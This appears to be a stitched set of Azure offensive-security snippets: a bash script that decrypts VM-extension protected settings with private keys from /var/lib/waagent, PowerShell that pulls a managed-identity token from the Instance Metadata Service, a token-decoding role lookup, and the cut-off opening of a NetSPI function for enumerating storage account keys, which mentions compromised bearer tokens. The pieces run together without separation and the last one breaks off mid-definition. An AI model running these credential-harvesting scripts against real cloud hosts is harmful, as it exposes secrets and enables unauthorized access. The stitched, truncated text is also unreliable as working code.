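#!/bin/bash
# Decrypt the protected settings of every VM-extension ".settings" file under
# /var/lib/waagent/ and print them next to the file's public settings.
#
# Each settings file names the certificate its protectedSettings blob was
# encrypted to (protectedSettingsCertThumbprint); the matching
# <thumbprint>.crt / <thumbprint>.prv pair is read from /var/lib/waagent/.
# Requires jq, base64 and openssl, plus read access to the .prv key files.
# Output: one "File / Public Settings / Decrypted Protected Settings" group
# per settings file on stdout; the decrypted values are printed in clear text.

waagent_dir=/var/lib/waagent

# Find all ".settings" files in "/var/lib/waagent/" subdirectories.
# NUL-delimited so paths containing whitespace or newlines survive intact.
find "$waagent_dir/" -type f -name "*.settings" -print0 |
  while IFS= read -r -d '' file; do
    # The original printed $publicSettings without ever assigning it.
    publicSettings=$(jq '.runtimeSettings[].handlerSettings.publicSettings' "$file")
    thumbprint=$(jq -r '.runtimeSettings[].handlerSettings.protectedSettingsCertThumbprint' "$file")

    # The thumbprint becomes part of a key-file path, so accept hex digits
    # only. This also skips files without protected settings, where jq
    # prints "null".
    protectedSettingsDecrypted=
    if [[ "$thumbprint" =~ ^[0-9A-Fa-f]+$ ]]; then
      protectedSettingsDecrypted=$(
        jq -r '.runtimeSettings[].handlerSettings.protectedSettings' "$file" |
          base64 --decode |
          openssl smime -inform DER -decrypt \
            -recip "$waagent_dir/$thumbprint.crt" \
            -inkey "$waagent_dir/$thumbprint.prv" |
          jq .
      )
    else
      printf 'skipping decrypt for %s: no hex certificate thumbprint\n' "$file" >&2
    fi

    printf '%s\n' "File: $file"
    printf '%s\n' "Public Settings: $publicSettings"
    printf '%s\n' "Decrypted Protected Settings: $protectedSettingsDecrypted"
  done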
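# Reads the VM's subscription ID and a managed-identity token for Azure
# Resource Manager from the Instance Metadata Service (IMDS).
# Results: $subID (subscription ID) and $ArmToken (bearer token string).
# IMDS is reached on the link-local address 169.254.169.254 and requires the
# "Metadata: true" header on every request.
$imdsHeaders = @{Metadata="true"}

#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers $imdsHeaders -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId

#---------Get OAuth Token---------#
# The "resource" query parameter sets the token audience to the ARM endpoint.
# The token is a bearer credential: what it can do is bounded by the role
# assignments of the VM's managed identity, so keep it out of logs and transcripts.
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers $imdsHeaders -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token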
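# Lists the role assignments of the identity behind the current Az session by
# reading the object ID (oid claim) out of its own access token.

# Get a token and split out the payload: the middle of the three dot-separated
# JWT segments, with base64url characters mapped back to standard base64.
# NOTE(review): this expects (Get-AzAccessToken).Token to be a plain string;
# Az.Accounts versions that return a SecureString need it converted first --
# confirm against the installed module version.
$token = ((Get-AzAccessToken).Token).Split(".")[1].Replace('-', '+').Replace('_', '/')

# Add padding, if needed (base64url tokens omit the trailing "=")
while ($token.Length % 4) {$token += "="}

# Base64 decode and convert from JSON. JWT payloads are UTF-8, so decode as
# UTF-8 rather than ASCII to keep non-ASCII claim values intact.
# The payload is only decoded here, not signature-checked; that is fine for
# reading a token this session just obtained, but not for trusting a token
# received from elsewhere.
$claims = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($token)) | ConvertFrom-Json

# Extract the OID and use it as the filter for Get-AzRoleAssignment to find current roles
Get-AzRoleAssignment | Where-Object ObjectId -EQ $claims.oid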
Function get-MIStorageKeys{ | |
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020 | |
# Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity. | |
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting | |
# Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts) | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory=$false, |